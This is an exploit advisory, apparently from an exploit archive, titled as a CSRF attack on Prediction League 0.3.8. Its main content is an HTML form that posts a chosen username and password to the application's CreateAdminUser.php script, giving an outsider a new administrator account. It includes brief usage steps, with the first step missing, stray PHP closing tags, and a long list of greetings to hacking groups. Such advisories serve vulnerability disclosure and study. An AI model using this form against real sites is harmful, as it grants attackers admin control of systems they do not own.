========================================================================================
| # Title : Prediction League 0.3.8 CSRF Create Admin User Exploit
| # Author : indoushka
| # Home : www.iqs3cur1ty.com/vb
| # Tested on: Lunix Français v.(9.4 Ubuntu)
| # Bug : CSRF Create Admin User Exploit
====================== Exploit By indoushka =================================
# Exploit :
<form method="POST" action="http://127.0.0.1/PredictionLeague/CreateAdminUser.php">
<table>
<tr>
<td class="TBLHEAD" colspan="3" align="CENTER">
<font class="TBLHEAD">
Admin User Administration
</font>
</td>
</tr>
<tr>
<td class="TBLROW">
<font class="TBLROW">
Admin User Name
</font>
</td>
<td class="TBLROW">
<font class="TBLROW">
<input type="TEXT" size="20" name="USER" value="">
</font>
</td>
<td class="TBLROW">
<font class="TBLROW">
The name for the admin user.
</font>
</td>
</tr>
<tr>
<td class="TBLROW">
<font class="TBLROW">
Password
</font>
</td>
<td class="TBLROW">
<font class="TBLROW">
<input type="TEXT" size="20" name="PASSWORD">
</font>
</td>
<td class="TBLROW">
<font class="TBLROW">
The password for the admin user.
</font>
</td>
</tr>
<tr>
<td colspan="3" class="TBLROW" align="CENTER">
<input type="SUBMIT" NAME="CREATE" VALUE="CREATE">
</td>
</tr>
</table>
</form>
<?php
}
?>
</body>
</html>
2 - Save As .html
3 - Login
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------
